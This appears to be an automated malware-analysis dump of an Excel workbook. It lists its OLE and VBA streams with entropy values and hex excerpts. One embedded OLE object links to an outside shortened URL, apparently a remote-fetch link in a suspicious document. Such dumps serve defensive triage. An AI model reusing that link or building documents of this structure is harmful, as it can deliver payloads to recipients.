                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G W . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 47 ce fa 57 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet2"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                          VBA File Name:Sheet3.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G ' E . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 47 ce 27 45 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet3"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook.cls
                          Stream Size:985
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 47 ce 9f 17 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "ThisWorkbook"
                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.889430592781307
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:200
                          Entropy:3.2920681057018664
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . b . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                          General
                          Stream Path:MBD0020109B/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0020109B/\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:244
                          Entropy:2.701136490257069
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                          General
                          Stream Path:MBD0020109B/\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:220
                          Entropy:3.3813251513223976
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . ^ . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                          General
                          Stream Path:MBD0020109B/MBD000673C0/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.219515110876372
                          Base64 Encoded:False
                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0020109B/MBD000673C0/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:17987
                          Entropy:7.459551056433264
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . 4 v . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 a3 cd 34 76 01 00 00 04 05 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0020109B/MBD00083EA7/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.219515110876372
                          Base64 Encoded:False
                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0020109B/MBD00083EA7/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:14238
                          Entropy:7.30552548787177
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0020109B/MBD000846C9/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0020109B/MBD000846C9/\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:708
                          Entropy:3.6235698530352805
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                          General
                          Stream Path:MBD0020109B/MBD000846C9/\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:372
                          Entropy:2.913345911478729
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                          General
                          Stream Path:MBD0020109B/MBD000846C9/Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:97808
                          Entropy:7.365095307579232
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          General
                          Stream Path:MBD0020109B/MBD0018D4CE/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:20
                          Entropy:0.5689955935892812
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0020109B/MBD0018D4CE/\x3ObjInfo
                          CLSID:
                          File Type:data
                          Stream Size:4
                          Entropy:0.8112781244591328
                          Base64 Encoded:False
                          Data ASCII:. . . .
                          Data Raw:00 00 03 00
                          General
                          Stream Path:MBD0020109B/MBD0018D4CE/Contents
                          CLSID:
                          File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                          Stream Size:197671
                          Entropy:6.989042939766534
                          Base64 Encoded:True
                          Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0020109B/Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:386813
                          Entropy:7.815032759709734
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          General
                          Stream Path:MBD0020109C/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:776
                          Entropy:4.802068165751094
                          Base64 Encoded:False
                          Data ASCII:. . . . . . S b H . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . 6 . r . u . X . k . f . g . h . ? . & . s . h . e . r . r . y . = . s . t . r . a . n . g . e . & . o . c . t . a . g . o . n . = . f . r . a . g . i . l . e . & . i . n . i . t . i . a . t . i . v . e . = . r . o . u . g . h . & . c . o . r . s . a . g . e . . . & . . \\ . 0 . 4 ` _ ' E _ & . M _ M h . . t t . . . i : . 1 Q U . ] 7 @ $ % } . V . c . . . .
                          Data Raw:01 00 00 02 03 13 bd 53 f8 62 f3 48 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b fe 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 36 00 72 00 75 00 58 00 6b 00 66 00 67 00 68 00 3f 00 26 00 73 00 68 00 65 00 72 00 72 00 79 00 3d 00 73 00 74 00
                          General
                          Stream Path:Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:347601
                          Entropy:7.998744757425568
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . n 9 M . w d 9 t / . M 5 . N . 8 . 9 ; . . . L . . . . . . . . . . . . . \\ . p . F o . a ! | . . K . [ . z E . . | t T . S . j l { ' X . . j 3 . . ? S . b ~ 8 @ - 7 . j k v L . 0 . @ _ V l e . ] Y , z 7 ( f B . . . a . . . . . . = . . . O - J g ( . . . G r q A . 3 . ` l R . . . . . . . . . . . . . . . . . . A . . . E , . . . { n = . . . % 9 ' S @ . . . . . . 5 " . . . } . . . . 9 x . . . @ P . . . X 1 . . . . . Y j . 9 . F b : 0 . / . ? 1 . . . l _ . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 87 6e 91 fe 39 4d e7 a2 c9 0d f4 77 64 39 95 c1 74 9d 2f 1c c3 e1 4d 35 dd f5 13 4e ba 85 b6 7f a2 b3 38 9c 08 39 3b 02 18 d7 cd d5 00 9d 4c ac 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 ec cd e2 00 00 00 5c 00 70 00 9b 46 f9 6f 0a b7 61 aa a9 21 7c 0f 04 8b 4b 10 5b 84 10 7a bc 45 f3 8c de 86
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                          CLSID:
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:527
                          Entropy:5.252006696625403
                          Base64 Encoded:True
                          Data ASCII:I D = " { 6 B D B A A 9 7 - 2 C 9 1 - 4 B 1 F - B D E A - F D F 5 5 4 6 A 5 F 8 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 2 A 0 F 3 2 5 C 3 2 9 C 3 2 9 C
                          Data Raw:49 44 3d 22 7b 36 42 44 42 41 41 39 37 2d 32 43 39 31 2d 34 42 31 46 2d 42 44 45 41 2d 46 44 46 35 35 34 36 41 35 46 38 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                          CLSID:
                          File Type:data
                          Stream Size:104
                          Entropy:3.0488640812019017
                          Base64 Encoded:False
                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          CLSID:
                          File Type:data
                          Stream Size:2644
                          Entropy:3.986468125925358
                          Base64 Encoded:False
                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                          General
